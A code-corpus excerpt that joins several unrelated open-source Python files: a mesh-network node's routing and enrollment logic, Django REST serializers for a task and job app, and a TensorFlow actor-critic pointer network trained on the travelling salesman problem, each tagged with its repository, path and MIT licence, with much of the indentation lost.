self.networkAlive.clear()
UDP.networkAlive = False
UDP.join()
Rx.join()
Tx.join()
self.TCPRxQ.join()
self.TCPTxQ.join()
self.CommTxQ.join()
self.CommRxQ.join()
def _pingRouteTable(self):
# check if previous route requests were returned
self.pingLock.acquire()
for idx, node in enumerate(self.pingCache):
if node != 0:
# remove nodes where no response was returned
self.printinfo("Dropping Node: {0:04X}".format(node))
self.routeTable.removeNodeByIndex(self.routeTable.getNodeIndexFromId(node))
# unset returned route cache
self.pingCache[idx] = 0
self.pingLock.release()
    # send a RouteRequest for node 0xFFFF to each entry in the routing table
for node in self.routeTable.getConnectedNodes():
nodeIndex = self.routeTable.getNodeIndexFromId(node)
self.pingLock.acquire()
self.pingCache[nodeIndex - 1] = node
self.pingLock.release()
pingPkt = somnPkt.SomnPacket()
pingPkt.InitEmpty(somnPkt.SomnPacketType.RouteRequest)
pingPkt.PacketFields['SourceID'] = self.nodeID
pingPkt.PacketFields['LastNodeID'] = self.nodeID
pingPkt.PacketFields['DestID'] = 0xFFFF
pingPkt.PacketFields['HTL'] = 1
TxInfo = self.routeTable.getNodeInfoByIndex(nodeIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(pingPkt, TxInfo.nodeAddress, TxInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingTimer.start()
def _handleTx(self):
#print("Handle TX")
try:
TxData = self.CommTxQ.get(False)
except:
return
    #TODO: Tx Data coming from the Comm Layer needs to be packetized
route = 0
#check cache for route to dest ID
if TxData.nodeID in self.cacheId:
route = self.cacheRoute[self.cacheId.index(TxData.nodeID)]
else:
route = self._getRoute(TxData.nodeID)
#TODO Lock around this
self.pendingRouteID = 0
self.pendingRouteHTL = 1
    if route == 0: # no valid route found
self.printinfo(" *** NO ROUTE FOUND *** ")
return
    # insert path into cache, for now this is a FIFO eviction policy, should upgrade to an LFU policy
self.cacheId[self.cacheNextIndex] = TxData.nodeID
self.cacheRoute[self.cacheNextIndex] = route
self.cacheNextIndex = self.cacheNextIndex + 1
if self.cacheNextIndex > 3:
self.cacheNextIndex = 0
#pop first step in route from route string
nextRoute, newRoute = self._popRoute(route)
#nextRouteStep = newRoute[0]
#set route string in packet
TxPkt = somnPkt.SomnPacket()
TxPkt.InitEmpty(somnPkt.SomnPacketType.Message)
TxPkt.PacketFields['SourceID'] = self.nodeID
TxPkt.PacketFields['DestID'] = TxData.nodeID
TxPkt.PacketFields['Message'] = TxData.data
TxPkt.PacketFields['Route'] = newRoute
#create wrapper packet to send to next step in route
TxNodeInfo = self.routeTable.getNodeInfoByIndex(nextRoute)
if TxNodeInfo is None:
self.cacheRoute[self.cacheId.index(TxData.nodeID)] = 0
self.CommTxQ.task_done()
self.CommTxQ.put(TxData)
return
txPktWrapper = somnPkt.SomnPacketTxWrapper(TxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
#send packet to TX layer
self.TCPTxQ.put(txPktWrapper)
self.CommTxQ.task_done()
def _handleTcpRx(self):
while self._mainLoopRunning:
try:
RxPkt = self.TCPRxQ.get(False)
except:
continue
pktType = RxPkt.PacketType
#self.printinfo("Rx'd TCP packet of type: {0}".format(pktType))
if pktType == somnPkt.SomnPacketType.NodeEnrollment:
#print("Enrollment Packet Received")
self.pingTimer.cancel()
# There is a potential for stale enroll responses from enrollment phase, drop stale enroll responses
if RxPkt.PacketFields['ReqNodeID'] == self.nodeID: continue
# We need to disable a timer, enroll the node, if timer has expired, do nothing
for idx, pendingEnroll in enumerate(self.connCache):
if (RxPkt.PacketFields['ReqNodeID'], RxPkt.PacketFields['AckSeq']) == pendingEnroll[0]:
# disable timer
pendingEnroll[1].cancel()
# clear connCache entry
self.connCache[idx] = (('',0),)
# add node
self.routeTable.addNode(RxPkt.PacketFields['ReqNodeID'], Int2IP(RxPkt.PacketFields['ReqNodeIP']), RxPkt.PacketFields['ReqNodePort'])
#self.printinfo("Enrolled Node:{0:04X} ".format(RxPkt.PacketFields['ReqNodeID']))
break
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingTimer.start()
elif pktType == somnPkt.SomnPacketType.Message:
#print("({0:X}) Message Packet Received".format(self.nodeID))
# Check if we are the dest node
if RxPkt.PacketFields['DestID'] == self.nodeID:
self.printinfo("{0:04X} -> {1:04X}: {2}".format(RxPkt.PacketFields['SourceID'], self.nodeID, RxPkt.PacketFields['Message']))
# strip headers before pushing onto queue
commData = somnData(RxPkt.PacketFields['SourceID'], RxPkt.PacketFields['Message'])
self.CommRxQ.put(commData)
# otherwise, propagate the message along the route
elif not RxPkt.PacketFields['Route']:
# generate bad_route event
print("nothing to see here, move along folks")
else:
nextHop, RxPkt.PacketFields['Route'] = self._popRoute(RxPkt.PacketFields['Route'])
TxNodeInfo = self.routeTable.getNodeInfoByIndex(nextHop)
if TxNodeInfo is None:
          # this should generate a bad route packet
self.printinfo("Invalid Route Event")
self.TCPRxQ.task_done()
continue
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
elif pktType == somnPkt.SomnPacketType.RouteRequest:
#print("Route Req Packet Received")
if RxPkt.PacketFields['SourceID'] == self.nodeID:
# this our route request, deal with it.
if self.pendingRouteID == RxPkt.PacketFields['DestID']:
self.routeLock.acquire()
#self.printinfo("Servicing Returned Route for {0:04X}".format(self.pendingRouteID))
if RxPkt.PacketFields['Route'] != 0:
self.pendingRoute = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
self.routeBlock.set()
self.routeLock.release()
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['HTL'] < 10:
self.routeLock.release()
self.pendingRouteHTL = self.pendingRouteHTL + 1
RxPkt.PacketFields['HTL'] = self.pendingRouteHTL
RxPkt.PacketFields['ReturnRoute'] = 0
TxNodeInfo = self.routeTable.getNodeInfoByIndex(self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['DestID'] == 0xFFFF:
self.pingLock.acquire()
for idx, node in enumerate(self.pingCache):
if node == RxPkt.PacketFields['LastNodeID']:
self.pingCache[idx] = 0
self.pingLock.release()
self.TCPRxQ.task_done()
continue
else: # this route has been served
#self.routeLock.release()
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
# if route field is -0-, then it is an in-progress route request
# otherwise it is a returning route request
elif not RxPkt.PacketFields['Route']:
# check if we have the destid in our routeTable
idx = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['DestID'])
if idx < 0: # Continue route request
if RxPkt.PacketFields['HTL'] > 1:
#print("got multi Hop route request")
RxPkt.PacketFields['ReturnRoute'] = self._pushRoute(RxPkt.PacketFields['ReturnRoute'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['HTL'] = RxPkt.PacketFields['HTL'] - 1
lastID = RxPkt.PacketFields['LastNodeID']
RxPkt.PacketFields['LastNodeID'] = self.nodeID
#transmit to all nodes, except the transmitting node
i = 1
while i <= self.routeTable.getNodeCount():
TxNodeInfo = self.routeTable.getNodeInfoByIndex(i)
i = i + 1
if not TxNodeInfo.nodeID == lastID:
#continue
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['HTL'] == 1: # Last Node in query path
RxPkt.PacketFields['HTL'] = RxPkt.PacketFields['HTL'] - 1
TxNodeInfo = self.routeTable.getNodeInfoByIndex(self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else:
#if RxPkt.PacketFields['ReturnRoute'] == 0:
# TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['SourceID'])
#else:
TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else: # Dest Node is contained in route table
RxPkt.PacketFields['HTL'] = 0
RxPkt.PacketFields['Route'] = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['DestID']))
#if RxPkt.PacketFields['ReturnRoute'] == 0: # Route did not go past HTL = 1
# TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['SourceID'])
#else:
# TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID'])
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
#print("Dest Node Found: ",RxPkt.PacketFields)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else: # route path is non-empty
RxPkt.PacketFields['Route'] = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
#print("Route Non Empty: ",RxPkt.PacketFields)
TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif pktType == somnPkt.SomnPacketType.BadRoute:
print("Bad Route Packet Received")
self.TCPRxQ.task_done()
continue
elif pktType == somnPkt.SomnPacketType.AddConnection:
for pendingConn in self.connCache:
          if (RxPkt.PacketFields['RespNodeID'], RxPkt.PacketFields['AckSeq']) == pendingConn[0]: # This is a response
            # cancel timer
            pendingConn[1].cancel()
            # add node
            self.routeTable.addNode(RxPkt.PacketFields['RespNodeID'], Int2IP(RxPkt.PacketFields['RespNodeIP']), RxPkt.PacketFields['RespNodePort'])
# send AddConnection ACK packet
packedTxPkt = somnPkt.SomnPacketTxWrapper(somnPkt.SomnPacket(RxPkt.ToBytes()),Int2IP(RxPkt.PacketFields['RespNodeIP']), RxPkt.PacketFields['RespNodePort'])
self.TCPTxQ.put(packedTxPkt)
continue
# This is an incoming request
# generate a TCP Tx packet, start a timer, store ReqNodeID and timer object
TxPkt = somnPkt.SomnPacket(RxPkt.ToBytes())
        TxPkt.PacketFields['RespNodeID'] = self.nodeID
        TxPkt.PacketFields['RespNodeIP'] = IP2Int(self.nodeIP)
        TxPkt.PacketFields['RespNodePort'] = self.nodePort
        connCacheTag = (TxPkt.PacketFields['ReqNodeID'], TxPkt.PacketFields['AckSeq'])
        TxTimer = threading.Timer(5.0, self._connTimeout, connCacheTag)
        self.connCache[self.nextConnCacheIndex] = (connCacheTag, TxTimer)
        self.nextConnCacheIndex = self.nextConnCacheIndex + 1
        if self.nextConnCacheIndex >= len(self.connCache):
          self.nextConnCacheIndex = 0
print("Add Conn Packet Received")
elif pktType == somnPkt.SomnPacketType.DropConnection:
print("Drop Conn Packet Received")
else:
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
def _handleUdpRx(self):
#print("handleUDP")
try:
enrollPkt = self.UDPRxQ.get(False)
except:
return
enrollRequest = somnPkt.SomnPacket(enrollPkt)
self.UDPRxQ.task_done()
#ignore incoming enrollment requests from self
if enrollRequest.PacketFields['ReqNodeID'] == self.nodeID:
return
#self.printinfo("Got enrollment request from {0:04X}".format(enrollRequest.PacketFields['ReqNodeID']))
if self.routeTable.getNodeIndexFromId(enrollRequest.PacketFields['ReqNodeID']) > 0:
#self.printinfo("Node already connected, ignoring")
#self.UDPRxQ.task_done()
return
if self.routeTable.getAvailRouteCount() > 4 or (self.lastEnrollReq == enrollRequest.PacketFields['ReqNodeID'] and self.routeTable.getAvailRouteCount() > 0):
enrollRequest.PacketFields['RespNodeID'] = self.nodeID
enrollRequest.PacketFields['RespNodeIP'] = IP2Int(self.nodeIP)
enrollRequest.PacketFields['RespNodePort'] = self.nodePort
packedEnrollResponse = somnPkt.SomnPacketTxWrapper(enrollRequest, Int2IP(enrollRequest.PacketFields['ReqNodeIP']), enrollRequest.PacketFields['ReqNodePort'])
connCacheTag = (enrollRequest.PacketFields['ReqNodeID'], enrollRequest.PacketFields['AckSeq'])
TxTimer = threading.Timer(10.0, self._enrollTimeout, connCacheTag)
self.connCache[self.nextConnCacheIndex] = (connCacheTag, TxTimer)
self.nextConnCacheIndex = self.nextConnCacheIndex + 1
if self.nextConnCacheIndex >= len(self.connCache): self.nextConnCacheIndex = 0
#print("------- START UDP LISTEN -----------")
#print(self.routeTable.getAvailRouteCount())
#print("Responded to Enroll Request")
#print("---------- END UDP LISTEN-----------")
self.TCPTxQ.put(packedEnrollResponse)
TxTimer.start()
else:
self.lastEnrollReq = enrollRequest.PacketFields['ReqNodeID']
#self.UDPRxQ.task_done()
return
#get route from this node to dest node
def _getRoute(self, destId):
#first, check if the dest is a neighboring node
routeIndex = self.routeTable.getNodeIndexFromId(destId)
if routeIndex != -1:
return routeIndex & 0x7
#unknown route (discover from mesh)
routePkt = somnPkt.SomnPacket()
routePkt.InitEmpty(somnPkt.SomnPacketType.RouteRequest)
routePkt.PacketFields['SourceID'] = self.nodeID
routePkt.PacketFields['LastNodeID'] = self.nodeID
routePkt.PacketFields['RouteRequestCode'] = 1 #random.getrandbits(16)
routePkt.PacketFields['DestID'] = destId
routePkt.PacketFields['HTL'] = 1
self.pendingRouteID = destId
self.pendingRoute = 0
t = threading.Timer(10, self._routeTimeout)
idx = 1
while idx <= self.routeTable.getNodeCount():
TxNodeInfo = self.routeTable.getNodeInfoByIndex(idx)
#print("getRoute Packet Type: ", routePkt.PacketFields)
TxPkt = somnPkt.SomnPacketTxWrapper(routePkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
idx = idx + 1
t.start()
#self.printinfo("Waiting for route")
self.routeBlock.wait()
self.routeBlock.clear()
#self.printinfo("Waiting Done")
try:
t.cancel()
except:
pass
return self.pendingRoute
def _routeTimeout(self):
self.routeLock.acquire()
if not self.routeBlock.isSet():
#self.printinfo("routeTimer Activate")
self.pendingRoute = 0
self.pendingRouteID = 0
self.routeBlock.set()
self.routeLock.release()
#self.printinfo("routeTimer exit")
def _popRoute(self, route):
firstStep = route & 0x7
newRoute = route >> 3
return (firstStep, newRoute)
def _pushRoute(self, route, nextStep):
newRoute = (route << 3) | (nextStep & 0x7)
return newRoute
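  # Worked example (illustrative comment only, not from the original source):
  # routes are packed three bits per hop, each hop being a small routing-table
  # index. _pushRoute(0, 5) -> 0b101 = 5, _pushRoute(5, 3) -> 0b101011 = 43,
  # and _popRoute(43) -> (3, 5): the hop pushed last is popped first, which is
  # why returning route requests push hops in reverse traversal order.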
def _enrollTimeout(self, nodeID, ACK):
for idx, pendingEnroll in enumerate(self.connCache):
if (nodeID, ACK) == pendingEnroll[0]:
self.connCache[idx] = (('',0),)
break
return
def _connTimeout(self, nodeIP, nodePort):
for idx, connAttempt in enumerate(self.connCache):
if (nodeIP, nodePort) == connAttempt[0]:
self.connCache[idx] = (('',0),)
break
return
def addConnection(self, DestNodeID):
    addConnPkt = somnPkt.SomnPacket()
addConnPkt.InitEmpty(somnPkt.SomnPacketType.AddConnection)
addConnPkt.PacketFields['ReqNodeID'] = self.nodeID
    addConnPkt.PacketFields['ReqNodeIP'] = IP2Int(self.nodeIP)
addConnPkt.PacketFields['ReqNodePort'] = self.nodePort
    addConnPkt.PacketFields['AckSeq'] = random.getrandbits(16)
route = self._getRoute(DestNodeID)
if route > 0:
addConnPkt.PacketFields['Route'] = route
else:
self.printinfo("AddConnection Failed to get route")
def CreateNode(printCallback = None):
mesh = somnMesh(queue.Queue(), queue.Queue(), printCallback)
return mesh
if __name__ == "__main__":
mesh = CreateNode()
mesh.start()
| squidpie/somn | src/somnMesh.py | Python | mit | 23,564 |
from rest_framework import serializers
from workers.models import (TaskConfig,
Task,
Job,
TaskProducer)
from grabbers.serializers import (MapperSerializer,
SequenceSerializer)
from grabbers.models import Sequence
from drivers.serializers import DriverSerializer
from drivers.models import Driver
from django.core.exceptions import ObjectDoesNotExist
# == helpers ==
from delphi.utils.lizers import _required_fields, _get_or_instance
class TaskConfigDetailSerializer(serializers.ModelSerializer):
    '''
    Nested serializer exposing full driver and sequence details for a TaskConfig.
    '''
driver=DriverSerializer()
sequence=SequenceSerializer()
class Meta:
model=TaskConfig
#no proxy by api yet - missing fields::proxy,network_cap
fields=('name','driver','sequence','mapper','round_limit')
def create(self, validated_data):
        '''
        Return the existing TaskConfig with this name, or build a new
        (unsaved) instance with its driver and sequence resolved.
        '''
name=validated_data['name']
try:
task_config=TaskConfig.objects.get(name=name)
print("[-] We already this guy in db")
return task_config
except TaskConfig.DoesNotExist:
task_config=TaskConfig(name=name)
driver=_get_or_instance(Driver,'name',
validated_data['driver'],DriverSerializer)
sequence=_get_or_instance(Sequence,'name',
validated_data['sequence'],
SequenceSerializer)
task_config.driver=driver
task_config.sequence=sequence
return task_config
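# Hypothetical usage sketch (assumption, not part of this module): with Django
# REST Framework the nested create() above is normally driven as
#   serializer = TaskConfigDetailSerializer(data=payload)
#   serializer.is_valid(raise_exception=True)
#   task_config = serializer.save()  # dispatches to create(validated_data)
# where `payload` is a dict shaped like the Meta.fields tuple. Note that
# create() returns an unsaved TaskConfig instance, so the caller is
# responsible for persisting it.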
class TaskConfigListSerializer(serializers.HyperlinkedModelSerializer):
'''
'''
class Meta:
model=TaskConfig
fields=('url', 'name', 'sequence', 'driver', 'mapper','round_limit')
extra_kwargs = {
'url': {'view_name': 'api:task_config-detail', 'lookup_field':'name'},
'driver': {'view_name': 'api:driver-detail', 'lookup_field':'name'},
'sequence':{'view_name': 'api:sequence-detail', 'lookup_field':'name'},
'mapper':{'view_name':'api:mapper-detail', 'lookup_field':'name'},
}
class JobSerializer(serializers.ModelSerializer):
'''
'''
class Meta:
model=Job
fields=('status','name')
class TaskSerializer(serializers.ModelSerializer):
'''
'''
config=TaskConfigDetailSerializer()
job=JobSerializer()
class Meta:
model=Task
fields=('target_url', 'config', 'status', 'job')
| VulcanoAhab/delphi | workers/serializers.py | Python | mit | 2,526 |
import tensorflow as tf
from tensorflow.contrib.rnn import LSTMCell, GRUCell, MultiRNNCell, DropoutWrapper
from tqdm import tqdm
from decoder import pointer_decoder
import dataset
import matplotlib.pyplot as plt
# TODO
"""
Michel:
_____________________________________________________________________
- Plot tour with networkx
- Try Google's parameters
- Normalize input (scale distances) + reorder sequence
- Add bidirectional encoder, Dropout, Layers...
- Improve baseline estimate (CNN vs. FFN)
_____________________________________________________________________
- Variable seq length (padding) ****
- TSP with soft time windows (add exp loss) ***
(+ use Graph Theory : Coreness, Connectivity (or Katz_beta), Closeness, Betweeness, Cluster... & Topological descriptors - Reeb filtration ?)
_____________________________________________________________________
- Gumbel Softmax ?
- Monte Carlo Tree Search ?
_____________________________________________________________________
Pierre
- GAN (Discriminator CNN, Wasserstein...): pretrain ****
- Supervised setting: Cplex, Concorde... ***
- Back prop ***
_____________________________________________________________________
- Save & load model
- Use varscope, graph...
- import argparse (config)
- Summary writer (log)...
- Parallelize (GPU), C++...
- Nice plots, interface...
"""
class EncDecModel(object):
def __init__(self,args):
self.batch_size=args['batch_size'] # batch size
self.max_length = args['max_length'] # input sequence length (number of cities)
self.input_dimension = args['input_dimension'] # dimension of a city (coordinates)
self.K = self.input_dimension+1 # for KNN
self.input_new_dimension = self.input_dimension+2*self.K+1 # x,y + kNN index + kNN dist + indegree_ft (>0 for a hub)
self.input_embed=args['input_embed'] # dimension of embedding space (actor)
self.input_embed_c=args['input_embed'] # dimension of embedding space (critic)
self.num_neurons = args['num_neurons'] # dimension of hidden states (actor LSTM cell)
self.num_neurons_c = args['num_neurons'] # dimension of hidden states (critic LSTM cell)
self.hidden_dim= args['num_neurons'] # same thing...
self.initializer = tf.random_uniform_initializer(-args['init_range'], args['init_range']) # variables initializer
self.step=0 # int to reuse_variable in scope
self.init_bias_c = args['init_bias_c'] # initial bias for critic
self.temperature_decay = args['temperature_decay'] # temperature decay rate
self.build_actor()
self.build_critic()
self.build_reward()
self.build_optim()
def build_actor(self):
# Tensor blocks holding the input sequences [Batch Size, Sequence Length, Features]
self.input_coordinates = tf.placeholder(tf.float32, [self.batch_size, self.max_length, self.input_dimension], name="Input")
self.input_description = tf.placeholder(tf.float32, [self.batch_size, self.max_length, self.input_new_dimension], name="Input")
# Embed input sequence
W_embed = tf.Variable(tf.truncated_normal([1,self.input_new_dimension,self.input_embed]), name="W_embed")
with tf.variable_scope("Embed"):
if self.step>0:
tf.get_variable_scope().reuse_variables()
embeded_input = tf.nn.conv1d(self.input_description, W_embed, 1, "VALID", name="EncoderInput")
# ENCODER LSTM cell
cell1 = LSTMCell(self.num_neurons,initializer=self.initializer) # cell = DropoutWrapper(cell, output_keep_prob=dropout) or MultiRNNCell([cell] * num_layers)
# RNN-ENCODER returns the output activations [Batch size, Sequence Length, Num_neurons] and last hidden state as tensors.
encoder_output, encoder_state = tf.nn.dynamic_rnn(cell1, embeded_input, dtype=tf.float32) ### NOTE: encoder_output is the ref for attention ###
# DECODER initial state is the last relevant state from encoder
decoder_initial_state = encoder_state ### NOTE: if state_tuple=True, self.decoder_initial_state = (c,h) ###
# DECODER initial input is 'GO', a variable tensor
decoder_first_input = tf.Variable(tf.truncated_normal([self.batch_size,self.hidden_dim]), name="GO")
# DECODER LSTM cell
cell2 = LSTMCell(self.num_neurons,initializer=self.initializer)
# POINTER-DECODER returns the output activations, hidden states, hard attention and decoder inputs as tensors.
self.ptr = pointer_decoder(encoder_output, cell2)
self.positions, self.proba, self.log_softmax = self.ptr.loop_decode(decoder_initial_state, decoder_first_input)
def build_critic(self):
# Embed input sequence (for critic)
W_embed_c = tf.Variable(tf.truncated_normal([1,self.input_new_dimension,self.input_embed_c]), name="critic_W_embed")
with tf.variable_scope("Critic"):
if self.step>0:
tf.get_variable_scope().reuse_variables()
embeded_input_c = tf.nn.conv1d(self.input_description, W_embed_c, 1, "VALID", name="Critic_EncoderInput")
# ENCODER LSTM cell
cell_c = LSTMCell(self.num_neurons_c,initializer=self.initializer) # cell = DropoutWrapper(cell, output_keep_prob=dropout) or MultiRNNCell([cell] * num_layers)
# RNN-ENCODER returns the output activations [Batch size, Sequence Length, Num_neurons] and last hidden state as tensors.
encoder_output_c, encoder_state_c = tf.nn.dynamic_rnn(cell_c, embeded_input_c, dtype=tf.float32)
encoder_output_c = tf.transpose(encoder_output_c, [1, 0, 2]) # transpose time axis first [time steps x Batch size x num_neurons]
last_c = tf.gather(encoder_output_c, int(encoder_output_c.get_shape()[0]) - 1) # select last frame [Batch size x num_neurons]
### DO A CONVOLUTION HERE INSTEAD OF A FFN !!! ###
weight_c = tf.Variable(tf.truncated_normal([self.num_neurons_c, 1], stddev=0.1))
bias_c = tf.Variable(tf.constant(self.init_bias_c, shape=[1]))
self.prediction_c = tf.matmul(last_c, weight_c) + bias_c
def build_reward(self):
# From input sequence and hard attention, get coordinates of the agent's trip
tours=[]
shifted_tours=[]
for k in range(self.batch_size):
strip=tf.gather_nd(self.input_coordinates,[k])
tour=tf.gather_nd(strip,tf.expand_dims(self.positions[k],1))
tours.append(tour)
# Shift tour to calculate tour length
shifted_tour=[tour[k] for k in range(1,self.max_length)]
shifted_tour.append(tour[0])
shifted_tours.append(tf.stack(shifted_tour,0))
self.trip=tf.stack(tours,0)
self.shifted_trip=tf.stack(shifted_tours,0)
# Get delta_x**2 and delta_y**2 for shifting from a city to another
sqdeltax=tf.transpose(tf.square(tf.transpose((self.shifted_trip-self.trip),[2,1,0]))[0],[1,0]) # [batch,length,(x,y)] to (x)[length,batch] back to [batch,length]
sqdeltay=tf.transpose(tf.square(tf.transpose((self.shifted_trip-self.trip),[2,1,0]))[1],[1,0])
# Get distances separating cities at each step
euclidean_distances=tf.sqrt(sqdeltax+sqdeltay)
# Reduce to obtain tour length
self.distances=tf.expand_dims(tf.reduce_sum(euclidean_distances,axis=1),1)
# Define reward from objective and penalty
self.reward = -tf.cast(self.distances,tf.float32)
def build_optim(self):
# ACTOR Optimizer
self.opt1 = tf.train.AdamOptimizer(learning_rate=0.01,beta1=0.9,beta2=0.9,epsilon=0.1)
# Discounted reward
self.reward_baseline=tf.stop_gradient(self.reward-self.prediction_c) # [Batch size, 1]
# Loss
self.loss1=tf.reduce_sum(tf.multiply(self.log_softmax,self.reward_baseline),0)/self.batch_size
# Minimize step
self.train_step1 = self.opt1.minimize(self.loss1)
# Critic Optimizer
self.opt2 = tf.train.AdamOptimizer(learning_rate=0.01,beta1=0.9,beta2=0.9,epsilon=0.1)
# Loss
self.loss2=tf.losses.mean_squared_error(self.reward,self.prediction_c)
# Minimize step
self.train_step2 = self.opt2.minimize(self.loss2)
def run_episode(self,sess):
# Get feed_dict
training_set = dataset.DataGenerator()
coord_batch, dist_batch, input_batch = training_set.next_batch(self.batch_size, self.max_length, self.input_dimension)
feed = {self.input_coordinates: coord_batch, self.input_description: input_batch}
# Actor Forward pass
seq_input, permutation, seq_proba = sess.run([self.input_coordinates,self.positions,self.proba],feed_dict=feed)
# Critic Forward pass
b_s = sess.run(self.prediction_c,feed_dict=feed)
# Environment response
trip, circuit_length, reward = sess.run([self.trip,self.distances,self.reward], feed_dict=feed)
# Train step
if self.step==0:
loss1, train_step1 = sess.run([self.loss1,self.train_step1],feed_dict=feed)
else:
loss1, train_step1, loss2, train_step2= sess.run([self.loss1,self.train_step1,self.loss2,self.train_step2],feed_dict=feed)
self.step+=1
if self.step%100==0:
self.ptr.temperature*=self.temperature_decay
return seq_input, permutation, seq_proba, b_s, trip, circuit_length, reward
def train():
# Config
args={}
args['batch_size']=32
args['max_length']=5
args['input_dimension']=2
args['input_embed']=16
args['init_bias_c']=-args['max_length']/2
args['num_neurons']=256
args['init_range']=1
args['temperature_decay']=1
# Build Model and Reward
print("Initializing the Model...")
model = EncDecModel(args)
print("Starting training...")
with tf.Session() as sess:
tf.global_variables_initializer().run() #tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
print('\n')
print('Config:')
print('* Batch size:',model.batch_size)
print('* Sequence length:',model.max_length)
print('* City coordinates:',model.input_dimension)
print('* City dimension:',model.input_new_dimension)
print('* Input embedding:',model.input_embed)
print('* Num neurons (Actor & critic):',model.num_neurons)
print('\n')
avg_ac_deviation = []
avg_seq_proba = []
for i in tqdm(range(100)): # epoch i
seq_input, permutation, seq_proba, b_s, trip, circuit_length, reward = model.run_episode(sess)
# Store Actor-Critic deviation & seq proba
avg_ac_deviation.append(sess.run(tf.reduce_mean(100*(reward-b_s)/circuit_length)))
avg_seq_proba.append(sess.run(tf.reduce_mean(seq_proba)))
if i % 10 == 0:
#print('\n Input: \n', seq_input)
#print('\n Permutation: \n', permutation)
#print('\n Seq proba: \n', seq_proba)
#print('\n Critic baseline: \n', b_s)
#print('\n Trip : \n', trip)
#print('\n Circuit length: \n',circuit_length)
#print('\n Reward : \n', reward)
#print(' Average seq proba :',sess.run(tf.reduce_mean(seq_proba,0)))
print(' Average seq proba :',sess.run(tf.reduce_mean(seq_proba)))
print(' Average circuit length :',sess.run(tf.reduce_mean(circuit_length)))
print(' Average baseline :', sess.run(-tf.reduce_mean(b_s)))
print(' Average deviation:', sess.run(tf.reduce_mean(100*(reward-b_s)/circuit_length)))
print('\n')
if i % 1000 == 0 and not(i == 0):
saver.save(sess,"save/" +str(i) +".ckpt")
plt.figure(1)
plt.subplot(211)
plt.plot(avg_ac_deviation)
plt.ylabel('Critic average deviation (%)')
plt.xlabel('Epoch')
plt.subplot(212)
plt.plot(avg_seq_proba)
plt.ylabel('Actor average seq proba')
plt.xlabel('Epoch')
plt.show()
print('\n Trainable variables')
for v in tf.trainable_variables():
print(v.name)
print("Training is COMPLETE!")
saver.save(sess,"save/model.ckpt")
if __name__ == "__main__":
train() | pcournut/deep-learning-for-combinatorial-optimization | MD/nnet.py | Python | mit | 12,765 |
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
